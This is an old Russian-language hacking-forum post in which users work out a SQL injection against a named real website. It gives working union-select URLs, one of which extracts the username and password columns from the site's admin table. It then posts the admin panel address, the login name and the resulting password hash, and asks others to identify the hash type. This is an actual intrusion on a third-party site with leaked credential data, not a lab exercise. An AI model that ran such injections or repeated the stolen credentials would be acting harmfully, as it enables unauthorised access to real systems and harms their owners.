31.12.2008, 01:09
|
|
Участник форума
Регистрация: 28.07.2008
Сообщений: 158
Провел на форуме:
728470
Репутация:
115
|
|
Сообщение от vladvk
http://carepa.org/detail.php?uid=-53+union+select+1,2,3,4,5--
Не могу раскрутить, через order by показывает что там от 1 до 5 колонок но постоянно ошибка вылазит
Это значит скорее всего что параметр используется больше, чем в одном запросе, первый запрос прокатывает с 5 полями, второй выдает ошибку. В таких случаях или перебор, или ищи другой инъект. (Инъект не приходит в одиночку =)
например вот нормальная инъекция с этого сайта
Код:
http://carepa.org/mixers.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1--+
UPD: данные админа
Код:
http://carepa.org/mixers.php?id=-1+union+select+1,username,3,4,5,6,7,8,9,0,password+from+rc_admin--+
http://carepa.org/admin/
admin
$1$.y3.ta3.$Jk5.iyx3OT9IZlhJ8CKQy/
КТо скажет что за хэш?
Последний раз редактировалось prescott; 31.12.2008 в 01:16..
|
|
|